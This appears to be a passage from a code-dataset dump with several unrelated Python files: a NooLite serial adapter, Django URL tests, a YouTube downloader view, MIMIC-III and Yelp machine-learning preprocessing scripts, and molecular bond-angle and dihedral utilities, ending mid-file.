metadata (dict) | text (string, lengths 60 – 3.49M)
---|---|
{
"source": "jeweljohnt/test",
"score": 2
}
|
#### File: NooLite_F/MTRF64/MTRF64Adapter.py
```python
import logging
from enum import IntEnum
from serial import Serial
from struct import Struct
from time import sleep
from threading import Thread, Lock
from queue import Queue, Empty
from typing import List
class Command(IntEnum):
OFF = 0,
BRIGHT_DOWN = 1,
ON = 2,
BRIGHT_UP = 3,
SWITCH = 4,
BRIGHT_BACK = 5,
SET_BRIGHTNESS = 6,
LOAD_PRESET = 7,
SAVE_PRESET = 8,
UNBIND = 9,
STOP_BRIGHT = 10,
BRIGHT_STEP_DOWN = 11,
BRIGHT_STEP_UP = 12,
BRIGHT_REG = 13,
BIND = 15,
ROLL_COLOR = 16,
SWITCH_COLOR = 17,
SWITCH_MODE = 18,
SPEED_MODE = 19,
BATTERY_LOW = 20,
SENS_TEMP_HUMI = 21,
TEMPORARY_ON = 25,
MODES = 26,
READ_STATE = 128,
WRITE_STATE = 129,
SEND_STATE = 130,
SERVICE = 131,
CLEAR_MEMORY = 132
class Mode(IntEnum):
TX = 0,
RX = 1,
TX_F = 2,
RX_F = 3,
SERVICE = 4,
FIRMWARE_UPDATE = 5
class ResponseCode(IntEnum):
SUCCESS = 0,
NO_RESPONSE = 1,
ERROR = 2,
BIND_SUCCESS = 3
class Action(IntEnum):
SEND_COMMAND = 0,
SEND_BROADCAST_COMMAND = 1,
READ_RESPONSE = 2,
BIND_MODE_ON = 3,
BIND_MODE_OFF = 4,
CLEAR_CHANNEL = 5,
CLEAR_MEMORY = 6,
UNBIND_ADDRESS_FROM_CHANNEL = 7,
SEND_COMMAND_TO_ID_IN_CHANNEL = 8,
SEND_COMMAND_TO_ID = 9
class IncomingDataException(Exception):
"""Base class for response exceptions."""
class OutgoingData(object):
mode = Mode.TX
action = Action.SEND_COMMAND
channel = 0
command = Command.OFF
format = 0
data = bytearray(4)
id = 0
def __repr__(self):
return "<Request (0x{0:x}), mode: {1}, action: {2}, channel: {3:d}, command: {4:d}, format: {5:d}, data: {6}, id: 0x{7:x}>".format(id(self), self.mode, self.action, self.channel, self.command, self.format, self.data, self.id)
class IncomingData(object):
mode = None
status = None
channel = None
command = None
count = None
format = None
data = None
id = None
def __repr__(self):
return "<Response (0x{0:x}), mode: {1}, status: {2}, packet_count: {3} channel: {4:d}, command: {5:d}, format: {6:d}, data: {7}, id: 0x{8:x}>".format(id(self), self.mode, self.status, self.count, self.channel, self.command, self.format, self.data, self.id)
_LOGGER = logging.getLogger("MTRF64USBAdapter")
_LOGGER.setLevel(logging.WARNING)
_LOGGER_HANDLER = logging.StreamHandler()
_LOGGER_HANDLER.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s", "%Y-%m-%d %H:%M:%S"))
_LOGGER.addHandler(_LOGGER_HANDLER)
class MTRF64Adapter(object):
_packet_size = 17
_serial = None
_read_thread = None
_command_response_queue = Queue()
_incoming_queue = Queue()
_send_lock = Lock()
_listener_thread = None
_listener = None
_is_released = False
def __init__(self, port: str, on_receive_data=None):
self._serial = Serial(baudrate=9600)
self._serial.port = port
self._serial.open()
self._listener = on_receive_data
self._read_thread = Thread(target=self._read_loop)
self._read_thread.daemon = True
self._read_thread.start()
self._listener_thread = Thread(target=self._read_from_incoming_queue)
self._listener_thread.daemon = True
self._listener_thread.start()
def release(self):
self._is_released = True
self._serial.close()
self._incoming_queue.put(None)
self._listener = None
    def send(self, data: OutgoingData) -> List[IncomingData]:
responses = []
packet = self._build(data)
with self._send_lock:
_LOGGER.debug("Send:\n - request: {0},\n - packet: {1}".format(data, packet))
self._command_response_queue.queue.clear()
self._serial.write(packet)
try:
while True:
response = self._command_response_queue.get(timeout=2)
responses.append(response)
if response.count == 0:
break
except Empty as err:
_LOGGER.error("Error receiving response: {0}.".format(err))
        # For the plain NooLite modes (TX/RX) we need a short delay: the adapter
        # sends its response without waiting until the command has actually been
        # delivered to the module. If we send a new command before the previous
        # one has been transmitted over the air, the adapter will ignore it.
if data.mode == Mode.TX or data.mode == Mode.RX:
sleep(0.2)
return responses
# Private
    def _crc(self, data) -> int:
        # Simple 8-bit checksum: sum of all bytes, truncated to one byte.
        return sum(data) & 0xFF
def _build(self, data: OutgoingData) -> bytes:
format_begin = Struct(">BBBBBBB4sI")
format_end = Struct("BB")
packet = format_begin.pack(171, data.mode, data.action, 0, data.channel, data.command, data.format, data.data, data.id)
packet_end = format_end.pack(self._crc(packet), 172)
packet = packet + packet_end
return packet
def _parse(self, packet: bytes) -> IncomingData:
if len(packet) != self._packet_size:
raise IncomingDataException("Invalid packet size: {0}".format(len(packet)))
format = Struct(">BBBBBBB4sIBB")
data = IncomingData()
start_byte, data.mode, data.status, data.count, data.channel, data.command, data.format, data.data, data.id, crc, stop_byte = format.unpack(packet)
if (start_byte != 173) or (stop_byte != 174) or (crc != self._crc(packet[0:-2])):
raise IncomingDataException("Invalid response")
return data
def _read_loop(self):
while True:
packet = self._serial.read(self._packet_size)
if self._is_released:
break
try:
data = self._parse(packet)
_LOGGER.debug("Receive:\n - packet: {0},\n - data: {1}".format(packet, data))
if data.mode == Mode.TX or data.mode == Mode.TX_F:
self._command_response_queue.put(data)
elif data.mode == Mode.RX or data.mode == Mode.RX_F:
self._incoming_queue.put(data)
else:
pass
except IncomingDataException as err:
_LOGGER.error("Packet error: {0}".format(err))
pass
def _read_from_incoming_queue(self):
while True:
input_data = self._incoming_queue.get()
if self._is_released:
break
if self._listener is not None:
self._listener(input_data)
```
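Below is a minimal usage sketch for the adapter class above, not part of the original module. The serial port path and the channel number are assumptions for illustration; the real values depend on where the MTRF-64 dongle is attached and which channel a device was bound to.

```python
# Hypothetical example: switch on a device bound to channel 1 of an MTRF-64
# adapter attached at /dev/ttyUSB0 (both values are assumptions).
def on_receive(data):
    print("incoming:", data)

adapter = MTRF64Adapter("/dev/ttyUSB0", on_receive_data=on_receive)
request = OutgoingData()
request.mode = Mode.TX
request.action = Action.SEND_COMMAND
request.channel = 1
request.command = Command.ON
responses = adapter.send(request)
print(responses)
adapter.release()
```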
|
{
"source": "jewells07/mumbleapi",
"score": 2
}
|
#### File: users/tests/test_urls.py
```python
from django.urls import reverse, resolve
from rest_framework import status
from rest_framework.test import APITestCase
from users.views import (
    followUser, users, UserProfileUpdate,
    ProfilePictureUpdate, usersRecommended,
    user, userMumbles, userArticles, passwordChange,
    sendActivationEmail, activate)
# Create your tests here.
class AccountTests(APITestCase):
def setUp(self):
pass
def test_users_url(self):
url = 'users-api:users'
reversed_url = reverse(url)
response = self.client.get('/api/users/')
self.assertEqual(resolve(reversed_url).func,users)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_users_follow_url(self):
url = 'users-api:follow-user'
reversed_url = reverse(url,args=['praveen'])
self.assertEqual(resolve(reversed_url).func,followUser)
def test_user_profile_update_url(self):
url = 'users-api:profile_update'
reversed_url = reverse(url)
self.assertEqual(resolve(reversed_url).func.view_class,UserProfileUpdate)
def test_profile_update_photo_url(self):
url = 'users-api:profile_update_photo'
reversed_url = reverse(url)
resolved = resolve(reversed_url).func
self.assertEqual(resolved.view_class,ProfilePictureUpdate)
def test_users_recommended_url(self):
url = 'users-api:users-recommended'
reversed_url = reverse(url)
self.assertEqual(resolve(reversed_url).func,usersRecommended)
def test_user_url(self):
url = 'users-api:user'
reversed_url = reverse(url,args=['test'])
self.assertEqual(resolve(reversed_url).func,user)
def test_user_mumbles(self):
url = 'users-api:user-mumbles'
reversed_url = reverse(url,args=['test'])
self.assertEqual(resolve(reversed_url).func,userMumbles)
def test_user_articles_url(self):
url = 'users-api:user-articles'
reversed_url = reverse(url,args=['test'])
self.assertEqual(resolve(reversed_url).func,userArticles)
def test_user_password_url(self):
url = 'users-api:password-change'
reversed_url = reverse(url)
self.assertEqual(resolve(reversed_url).func,passwordChange)
def test_send_activation_email_url(self):
url = 'users-api:send-activation-email'
reversed_url = reverse(url)
self.assertEqual(resolve(reversed_url).func,sendActivationEmail)
def test_active_user_account_url(self):
url = 'users-api:verify'
reversed_url = reverse(url,args=['903u924u934u598348943','*&6g83chruhrweriuj'])
self.assertEqual(resolve(reversed_url).func,activate)
```
|
{
"source": "jewells07/YT_Downloader",
"score": 3
}
|
#### File: YT_Downloader/youtube_download/views.py
```python
from django.shortcuts import render, redirect
# pytube package for downloading YouTube videos
from pytube import YouTube
import os
import threading
# Create your views here.
url = ''
class Complete(threading.Thread):
def __init__(self, url, res, homedir):
self.url = url
self.res = res
self.homedir = homedir
threading.Thread.__init__(self)
def run(self):
YouTube(self.url).streams.get_by_resolution(self.res).download(self.homedir + '/Downloads')
def ytb_down(request):
return render(request,'ytb_main.html')
def yt_download(request):
global url
url = request.GET.get('url')
    # Create a YouTube object to inspect which streams are available for download
try:
obj = YouTube(url)
resolutions = []
strm_all = obj.streams.filter(progressive = True, file_extension = 'mp4').all()
for i in strm_all:
resolutions.append(i.resolution)
resolutions = list(dict.fromkeys(resolutions))
        embed_link = url.replace("watch?v=", "embed/")
        return render(request, 'yt_download.html', {'rsl': resolutions, 'embd': embed_link})
    except Exception:
        # If anything goes wrong (bad URL, unavailable video, no network), show the error page.
        return render(request, 'sorry.html')
def download_complete(request,res):
global url
homedir = os.path.expanduser("~")
# dirs = homedir + '/Downloads'
# print(f'Direct: ', f'{dirs}/Downloads')
if request.method == 'POST':
Complete(url, res, homedir).start()
# YouTube(url).streams.get_by_resolution(res).download(homedir + '/Downloads')
return render (request, 'download_complete.html')
else:
return render(request, 'sorry.html')
```
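The views above are not wired to any routes in this file. A minimal `urls.py` sketch that could sit next to it might look like the following; the route paths and names are illustrative assumptions, not taken from the project.

```python
# youtube_download/urls.py -- hypothetical routing for the views above.
from django.urls import path
from . import views

urlpatterns = [
    path('', views.ytb_down, name='ytb_down'),                 # form page (ytb_main.html)
    path('download/', views.yt_download, name='yt_download'),  # reads ?url=... from the query string
    path('download/<str:res>/', views.download_complete, name='download_complete'),  # POST starts the download thread
]
```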
|
{
"source": "jewelltaylor/mimic3-benchmarks",
"score": 2
}
|
#### File: mimic3models/in_hospital_mortality/save_mimic_data.py
```python
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import argparse
import os
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from mimic3models import common_utils
from mimic3models.in_hospital_mortality import utils
from mimic3benchmark.readers import InHospitalMortalityReader
from mimic3models.preprocessing import Discretizer, Normalizer
def read_and_extract_features(reader, period, features):
ret = common_utils.read_chunk(reader, reader.get_number_of_examples())
# ret = common_utils.read_chunk(reader, 100)
X = common_utils.extract_features_from_rawdata(ret['X'], ret['header'], period, features)
return (X, ret['y'], ret['name'])
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, help='Path to the data of in-hospital mortality task',
default=os.path.join(os.path.dirname(__file__), '../../data/in-hospital-mortality/'))
parser.add_argument('--output_dir', type=str, help='Directory relative to which all output files are stored',
default='.')
args = parser.parse_args()
# Build readers, discretizers, normalizers
train_reader = InHospitalMortalityReader(dataset_dir=os.path.join(args.data, 'train'),
listfile=os.path.join(args.data, 'train_listfile.csv'),
period_length=48.0)
val_reader = InHospitalMortalityReader(dataset_dir=os.path.join(args.data, 'train'),
listfile=os.path.join(args.data, 'val_listfile.csv'),
period_length=48.0)
test_reader = InHospitalMortalityReader(dataset_dir=os.path.join(args.data, 'test'),
listfile=os.path.join(args.data, 'test_listfile.csv'),
period_length=48.0)
print('Reading data and extracting features ...')
(train_X, train_y, train_names) = read_and_extract_features(train_reader, "all", "all")
(val_X, val_y, val_names) = read_and_extract_features(val_reader, "all", "all")
(test_X, test_y, test_names) = read_and_extract_features(test_reader, "all", "all")
print(' train data shape = {}'.format(train_X.shape))
print(' validation data shape = {}'.format(val_X.shape))
print(' test data shape = {}'.format(test_X.shape))
print('Imputing missing values ...')
imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
imputer.fit(train_X)
train_X = np.array(imputer.transform(train_X), dtype=np.float32)
val_X = np.array(imputer.transform(val_X), dtype=np.float32)
test_X = np.array(imputer.transform(test_X), dtype=np.float32)
print('Normalizing the data to have zero mean and unit variance ...')
scaler = StandardScaler()
scaler.fit(train_X)
train_X = scaler.transform(train_X)
val_X = scaler.transform(val_X)
test_X = scaler.transform(test_X)
train_data_output_path = f"{args.output_dir}/train_data.npy"
val_data_output_path = f"{args.output_dir}/val_data.npy"
test_data_output_path = f"{args.output_dir}/test_data.npy"
train_lbl_output_path = f"{args.output_dir}/train_lbl.npy"
val_lbl_output_path = f"{args.output_dir}/val_lbl.npy"
test_lbl_output_path = f"{args.output_dir}/test_lbl.npy"
np.save(train_data_output_path, train_X)
np.save(val_data_output_path, val_X)
np.save(test_data_output_path, test_X)
np.save(train_lbl_output_path, np.array(train_y))
np.save(val_lbl_output_path, np.array(val_y))
np.save(test_lbl_output_path, np.array(test_y))
```
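The script writes six `.npy` files. A short sketch of how a downstream script might reload them, assuming the default `--output_dir` of `.`:

```python
import numpy as np

# Reload the arrays written by save_mimic_data.py (default --output_dir '.').
train_X = np.load('train_data.npy')   # float32, shape (n_train, n_features)
train_y = np.load('train_lbl.npy')    # in-hospital mortality labels
val_X, val_y = np.load('val_data.npy'), np.load('val_lbl.npy')
test_X, test_y = np.load('test_data.npy'), np.load('test_lbl.npy')
print(train_X.shape, val_X.shape, test_X.shape)
```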
|
{
"source": "Jewelryland/YelpRecSys",
"score": 2
}
|
#### File: YelpRecSys/RecSys/recsys_cbf.py
```python
__author__ = 'Adward'
# Python utils imports
import math
import os
import sys
from time import time
import sqlite3
# Standard scientific Python imports
import matplotlib.pyplot as plt
import numpy as np
# Import classifiers and performance metrics
from sklearn.preprocessing import *
from sklearn.feature_extraction import DictVectorizer
from sklearn.cross_validation import StratifiedKFold, ShuffleSplit
from sklearn.metrics import *
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.decomposition import PCA
# Constant values
DATA_PATH = '/Users/Adward/OneDrive/YelpData/'
DB_PATH = os.path.join(DATA_PATH, 'yelp.sqlite')
n_sample = 2225213 # 1992542
review_class = [260492, 190048, 282115, 591618, 900940] # 2.6:1.9:2.8:5.9:9.0
earliest = {'day': 20041018, 'month': 200410, 'year': 2004}
latest = {'day': 20151224, 'month': 201512, 'year': 2015}
valid_states = ['AZ', 'NV', 'ON', 'WI', 'QC', 'SC', 'EDH', 'PA', 'MLN', 'BW', 'NC', "IL"]
applied_categories = {'Debt Relief Services', 'Armenian', 'Spine Surgeons', 'House Sitters', 'Taxidermy', 'Iberian', 'Pita', 'Beer Hall', 'Childproofing', 'Assisted Living Facilities', 'Rhinelandian', 'Oriental', 'Palatine', 'Carpenters', 'Choirs', 'Wok', 'Nursing Schools', 'Surf Shop', 'Perfume', 'Kitchen Incubators', 'Flowers', 'Swiss Food', 'Castles', 'Parenting Classes', 'Ferries', 'Donairs', 'Rest Stops', 'Gerontologists', 'Bike Sharing', 'Piano Stores', 'Trinidadian', 'Translation Services', 'Eastern European', 'College Counseling', 'Community Gardens', 'Wine Tasting Classes', 'Art Restoration', 'Slovakian', 'Backshop', 'Supper Clubs', 'Editorial Services', 'Dialysis Clinics', 'Childbirth Education', 'IP & Internet Law', 'Tax Law', 'Farming Equipment', 'Art Tours', 'Concept Shops', 'Mosques', 'Australian'}
# Loading samples from the database & pre-scale
def load_samples(attr_list, prescale=False, oversampling=(0, 0), elite_expand=False, state_all=False):
'''
:param attr_list: List[Str], containing the list of features to be selected and encoded
:param prescale: Bool, (when True) pre-scale features with too large range of values to expedite converging
:param oversampling: Tuple(Int), double review samples with star classes in range
:param elite_expand: Bool, (when True) encode 12 features related to user.elite as [elite20**] & elite-year-sum;
(when False) only 1 feature stands for elite-year-sum
:param state_all: Bool, (when True) occupies 39 features; (when False) using only 12 prime states PLUS OTHERS
:return: List[Dict], List[Int]
'''
t = time()
with sqlite3.connect(DB_PATH) as conn:
# conn.execute('CREATE TEMP TABLE tmp_b1 (business_id TEXT, avg_star_elite REAL)')
# conn.execute('CREATE TEMP TABLE tmp_b2 (business_id TEXT, avg_star_nonelite REAL)')
# conn.execute('INSERT INTO tmp_b1 (business_id, avg_star_elite) '
# 'SELECT business_id, AVG(average_stars) AS avg_star_elite FROM '
# '(review JOIN user USING (user_id)) WHERE elite!="" GROUP BY business_id')
# conn.execute('INSERT INTO tmp_b2 (business_id, avg_star_nonelite) '
# 'SELECT business_id, AVG(average_stars) AS avg_star_nonelite FROM '
# '(review JOIN user USING (user_id)) WHERE elite="" GROUP BY business_id')
# conn.execute('DROP TABLE IF EXISTS bstat_by_elite')
# conn.execute('CREATE TABLE bstat_by_elite (business_id TEXT, avg_star_elite REAL, avg_star_nonelite REAL)')
# conn.execute('INSERT INTO tmp_b SELECT * FROM '
# '((business LEFT OUTER JOIN tmp_b1 USING (business_id)) '
# 'LEFT OUTER JOIN tmp_b2 USING (business_id))')
# conn.row_factory = sqlite3.Row
cur = conn.execute('SELECT ' + ','.join(attr_list) +
' FROM ('
'(review JOIN (business JOIN b_category_pca USING (business_id)) USING (business_id)) '
'JOIN user '
'USING (user_id) )')
sample_matrix = [] # feature matrix to return
targets = [] # class vector
row_num = 0
for row in cur:
targets.append(row[0]) # review.stars
# construct temp feature dict
sample = {}
for j in range(1, len(attr_list)):
sample[attr_list[j]] = row[j]
# encode features for business.state
if ('business.state' in attr_list) and (not state_all) and (sample['business.state'] not in valid_states):
sample['business.state'] = 'OTH' # other 17 states with few business recorded
if ('user_state' in attr_list) and (not state_all) and (sample['user_state'] not in valid_states):
sample['user_state'] = 'OTH'
# Create elite-related features || encode elite-year-number
# if elite_expand:
# for year in range(earliest['year']+1, latest['year']+1):
# sample['elite'+str(year)] = 0
# if len(sample['elite']):
# elite_years = [int(y) for y in sample['elite'].split('&')]
# sample['elite'] = len(elite_years)
# for year in elite_years:
# sample['elite'+str(year)] = 1
# else:
# sample['elite'] = 0
# else:
# if len(sample['elite']):
# sample['elite'] = len(sample['elite'].split('&'))
# else:
# sample['elite'] = 0
# encode features of friends_stat
# encode features of business_avg_stars_by_elite
nan_list = ['avg_review_count', 'avg_votes', 'avg_star_elite', 'avg_star_nonelite']
for feat in nan_list:
if feat in attr_list and not sample[feat]:
sample[feat] = 0
# encode business.categories features
if 'cas' in attr_list:
cas = sample['cas'].split(';')
del sample['cas']
for i in range(3):
sample['ca_'+str(i)] = float(cas[i])
# for ca in applied_categories:
# sample['ca_'+ca] = 0
# if len(sample['categories']):
# categories = sample['categories'].split('&')
# for j in range(len(categories)):
# if categories[j] in applied_categories:
# sample['ca_' + categories[j]] = 1
# del sample['categories']
# process control & display
row_num += 1
# print(sample)
if row_num % 100000 == 0:
print("%.1f %%" % (row_num * 100 / n_sample))
sample_matrix.append(sample)
# oversampling some review star classes
if oversampling[0] <= targets[-1] <= oversampling[1]:
sample_matrix.append(sample)
targets.append(targets[-1])
# if row_num == 10000:
# break
print('Done with joining & collecting data from database, using ', time()-t, 's')
return sample_matrix, targets
def reform_features(sample_matrix, scaling=False):
t = time()
print('Start reforming categorical features using OneHotDecoding...')
print(sample_matrix[0])
dictVectorizer = DictVectorizer()
X = dictVectorizer.fit_transform(sample_matrix).toarray()
n_features = len(X[0])
if scaling:
# scaler = StandardScaler()
# X = scaler.fit_transform(X)
X = scale(X)
print('Feature Num.:', n_features)
print('Done with reforming categorical features, using ', time()-t, 's')
# print(X[0])
return X, n_features
def train_and_predict(X, y, div, model, n_features):
print('Starting 5-fold training & cross validating...')
# input()
# scores = cross_validation.cross_val_score(clf, data, target, cv=2, scoring='f1_weighted')
t = time()
scores = {'f1_by_star': [[] for i in range(5)], 'f1_weighted': [], 'mae': [], 'rmse': []}
feature_weights = np.zeros(n_features)
for train, test in div:
X_train = np.array([X[i] for i in train])
X_test = np.array([X[i] for i in test])
y_train = np.array([y[i] for i in train])
y_test = np.array([y[i] for i in test])
model.fit(X_train, y_train)
feature_weights += model.feature_importances_
y_pred = model.predict(X_test)
# Metrics below
f1_by_star = f1_score(y_true=y_test, y_pred=y_pred, average=None)
for i in range(5):
scores['f1_by_star'][i].append(f1_by_star[i])
# Calculate metrics for each label, and find their average, weighted by support
# (the number of true instances for each label).
# This alters ‘macro’ to account for label imbalance;
# it can result in an F-score that is not between precision and recall.
scores['f1_weighted'].append(f1_score(y_true=y_test, y_pred=y_pred, average='weighted'))
scores['mae'].append(mean_absolute_error(y_true=y_test, y_pred=y_pred))
scores['rmse'].append(mean_squared_error(y_true=y_test, y_pred=y_pred) ** 0.5)
print(classification_report(y_true=y_test, y_pred=y_pred), '\n')
# print(confusion_matrix(y_true=y_test, y_pred=y_pred), '\n', time()-t, 's used >>\n')
print(time()-t, 's used >>\n')
# scores = np.array(scores)
# print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
print('Done with 5-fold training & cross validating, using ', time()-t, 's')
print('F1-Score By Star Classes: %.3f | %.3f | %.3f | %.3f | %.3f'
% tuple([np.array(star).mean() for star in scores['f1_by_star']]))
print('F1-Score Weighted: %.3f' % (np.array(scores['f1_weighted']).mean()))
print('MAE: %.3f' % (np.array(scores['mae']).mean()))
print('RMSE: %.3f' % (np.array(scores['rmse']).mean()))
feature_weights /= len(div)
# print(feature_weights)
    for i in range(n_features):
        print('%.1f' % (feature_weights[i] * 100), end=' ')
if __name__ == '__main__':
test_flag = 0
for arg in sys.argv:
if arg.split('=')[0] == 'test':
test_flag = arg.split('=')[1]
attr_list = [
'review.stars', # target value, must be placed at this first place
'average_stars',
# 'avg_friends_star',
# 'avg_review_count',
# 'avg_star_elite',
# 'avg_star_nonelite',
# 'avg_votes',
# 'business.city', # occupies 380 features
'business.review_count',
'business.stars',
# 'business.state', # occupies 29 -> 13 features
# 'categories', # occupies 890 features
'cas',
'checkins',
'compliments',
# 'elite', # occupies 12 -> 1 feature(s)
'fans',
'review.votes',
'review_date',
'user.review_count',
'user.votes',
# 'user_state',
# 'weekends_open', # binary
'yelping_since',
]
samples, targets = load_samples(attr_list, prescale=False, oversampling=(1, 4))
samples, n_features = reform_features(samples, scaling=False)
n_samples = len(samples) # may be different from original n_sample in db !
print('n_samples:', n_samples)
# div = StratifiedKFold(targets, n_folds=5) # 5-Fold Cross Validation
div = ShuffleSplit(n_samples, n_iter=5, test_size=0.2, random_state=0)
if test_flag:
div = ShuffleSplit(n_samples, n_iter=1, test_size=0.2, random_state=0)
model = RandomForestClassifier(n_estimators=5, max_features='auto') # int(math.sqrt(n_features)))
# model = GradientBoostingClassifier(n_estimators=5, learning_rate=1, max_depth=2, random_state=0)
train_and_predict(samples, targets, div, model, n_features)
```
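For readers unfamiliar with `DictVectorizer`, here is a tiny standalone illustration of the one-hot encoding step performed in `reform_features()`; the sample values are made up.

```python
from sklearn.feature_extraction import DictVectorizer

# Two toy samples: string-valued features become one-hot columns
# (e.g. 'business.state=AZ'), numeric features pass through unchanged.
samples = [{'business.state': 'AZ', 'fans': 3},
           {'business.state': 'NV', 'fans': 0}]
vec = DictVectorizer()
X = vec.fit_transform(samples).toarray()
print(vec.get_feature_names_out())  # use get_feature_names() on older scikit-learn
print(X)
```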
|
{
"source": "jewettaij/dlpdb",
"score": 4
}
|
#### File: dlpdb/dlpdb/coords2angles.py
```python
import sys
from math import sqrt, cos, sin, tan, acos, asin, atan, pi
# Sometimes this program pipes its output to other programs which halt early.
# Below we silently suppress the ugly "Broken pipe" message this generates:
import signal
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def length_v(r):
lsqd = 0.0
for d in range(0,len(r)):
lsqd += r[d]*r[d]
return sqrt(lsqd)
def inner_prod_v(r1,r2):
result = 0.0
for d in range(0,len(r1)):
result += r1[d]*r2[d]
return result
def Coords2AnglesLengths(r0, r1, r2):
r10 = [r1[0]-r0[0], r1[1]-r0[1], r1[2]-r0[2]]
r21 = [r2[0]-r1[0], r2[1]-r1[1], r2[2]-r1[2]]
l10 = length_v(r10)
l21 = length_v(r21)
# The bond angle is the angle between r10 and r21
cos_theta = -inner_prod_v(r10, r21) / (l10 * l21)
if (cos_theta > 1.0):
cos_theta = 1.0
elif (cos_theta < -1.0):
cos_theta = -1.0
theta = acos(cos_theta)
return (theta, l10, l21)
def Coords2Angles(r0, r1, r2):
theta, l10, l21 = Coords2AnglesLengths(r0, r1, r2)
return theta
def main():
if (len(sys.argv) > 3):
sys.stderr.write('Error (coords2angles): number of arguments should not exceed 2.\n'\
' (The two arguments correspond to the number of lines of\n'\
' text to omit from the beginning and end of the file, respectively.)\n'\
' If one argument is passed, then both are assumed to be the same.\n'\
' If no argument is passed, then by default, no data is ignored.\nExiting...\n\n')
sys.exit(-1)
# NOTE: The "truncate" arguments are not really supported any more. Instead
# use other scripts to post-process the results printed by this program.
elif (len(sys.argv) == 3):
truncate_a = int(sys.argv[1])
truncate_b = int(sys.argv[2])
elif (len(sys.argv) == 2):
truncate_a = int(sys.argv[1])
truncate_b = truncate_a
else:
truncate_a = 0
truncate_b = 0
coords_list = []
# Read the file
for line in sys.stdin:
line = line.strip()
if line == '':
coords = []
else:
# Each line should contain a list of 9 numbers separated by whitespace.
coords = list(map(float, line.split()))
if len(coords) != 3*3:
sys.stderr.write('Error(coords2angles.py):\n'+'Each line should either contain 9 numbers or be blank.\n')
sys.exit(-1)
coords_list.append(coords)
    # Truncate the data we don't want.
    # (Why? The residues at the beginning and end of helices
    #  are less trustworthy than the residues in the middle.)
coords_list = coords_list[truncate_a:len(coords_list)-truncate_b]
N = len(coords_list)
for i in range(0,N):
if len(coords_list[i]) == 3*3:
r0 = [coords_list[i][3*0+0],
coords_list[i][3*0+1],
coords_list[i][3*0+2]]
r1 = [coords_list[i][3*1+0],
coords_list[i][3*1+1],
coords_list[i][3*1+2]]
r2 = [coords_list[i][3*2+0],
coords_list[i][3*2+1],
coords_list[i][3*2+2]]
theta, l10, l21 = Coords2AnglesLengths(r0, r1, r2)
sys.stdout.write(str(theta*180.0/pi)+" "+str(l10)+" "+str(l21)+'\n')
else:
# Otherwise, we write out impossible values to let the caller
# know that this particular angle could not be computed
sys.stdout.write('-360 -1 -1\n')
if __name__ == "__main__":
main()
```
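A quick sanity check of `Coords2Angles()` (not part of the original script): three points forming a right angle at the middle atom should give a bond angle of 90 degrees. This assumes the module is importable, for example when run from within the `dlpdb` package directory.

```python
from math import pi
from coords2angles import Coords2Angles  # or: from dlpdb.coords2angles import Coords2Angles

theta = Coords2Angles([0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0])
print(theta * 180.0 / pi)  # expected: 90.0
```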
#### File: dlpdb/dlpdb/coords2projected_dihedrals.py
```python
import sys
from math import sqrt, cos, sin, tan, acos, asin, atan, pi, floor
try:
from .closest_line_points import ClosestLinePoints
from .coords2dihedrals import Coords2DihedralsAnglesLengths,Coords2Dihedrals
except (ImportError, SystemError, ValueError):
# not installed as a package
from closest_line_points import ClosestLinePoints
from coords2dihedrals import Coords2DihedralsAnglesLengths,Coords2Dihedrals
import signal
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def Coords2ProjectedDihedralsLengths(r0, r1, r2, r3, branch_of_log=pi):
"""
Calculate the "projected" dihedral angle from the position of 4 atoms. I
define this as the difference in direction between two infinitely long lines
-The first line passes through the first two atoms (r0,r1).
-The other line (the "last line") passes through the last two atoms (r2,r3).
The "projected dihedral" angle can be thought of as the largest possible
apparent angle between these two lines when viewed from all possible
viewing directions. A pair of points (one on each line) is determined
that are closest to each other. The "projected dihedral" angle is the angle
one sees when viewing these two lines from direction of the axis connecting
these two closest points. If these 4 points are coplanar, the
"projected" dihedral angle between them is undefined.
"""
r10 = [r1[0]-r0[0],
r1[1]-r0[1],
r1[2]-r0[2]]
r32 = [r3[0]-r2[0],
r3[1]-r2[1],
r3[2]-r2[2]]
R1, R2 = ClosestLinePoints(r0, r2, r10, r32)
phi,theta0,theta1,l10,l21,l32 = Coords2DihedralsAnglesLengths(r0,
R1,
R2,
r3,
branch_of_log)
# (Note: theta0 and theta1 should both be approximately pi/2,
# so we don't bother to report these angles to the caller.)
return (phi, l10, l21, l32)
def Coords2ProjectedDihedrals(r0, r1, r2, r3, branch_of_log=pi):
    phi, l10, l21, l32 = Coords2ProjectedDihedralsLengths(r0, r1, r2, r3, branch_of_log)
    return phi
def main():
branch_of_log = pi # by default, dihedral angles lie in range: [-180,180.0)
truncate_a = 0
truncate_b = 0
if (len(sys.argv) > 4):
        sys.stderr.write('Error (coords2projected_dihedrals): number of arguments should not exceed 3.\n'
                         ' If an odd number of arguments is passed (1 or 3), then\n'
                         ' the first argument is assumed to be the branch-of-log, a number which is\n'
                         ' between 0 and 360.0. This argument indicates where the discontinuity in the\n'
                         ' dihedral angle is located. (By default it is 0 degrees, which\n'
                         ' corresponds to 4 atoms in the "cis" conformation.)\n'
' (The two arguments correspond to the number of lines of\n'\
' text to omit from the beginning and end of the file, respectively.)\n'\
' If one argument is passed, then both are assumed to be the same.\n'\
' If no argument is passed, then by default, no data is ignored.\nExiting...\n\n')
sys.exit(-1)
# NOTE: The "truncate" arguments are not really supported any more. Instead
# use other scripts to post-process the results printed by this program.
elif (len(sys.argv) == 4):
branch_of_log = float(sys.argv[1])
truncate_a = int(sys.argv[2])
truncate_b = int(sys.argv[3])
elif (len(sys.argv) == 3):
truncate_a = int(sys.argv[1])
truncate_b = int(sys.argv[2])
elif (len(sys.argv) == 2):
branch_of_log = float(sys.argv[1])
branch_of_log *= pi/180.0
coords_list = []
# Read the file
for line in sys.stdin:
line = line.strip()
        # Each line should contain a list of 12 numbers (the x,y,z coordinates
        # of 4 atoms) separated by whitespace.  If so, store the numbers in a
        # list variable (named "coords"), and append it to the list of coordinates.
        # However some lines might also be blank, in which case we append the
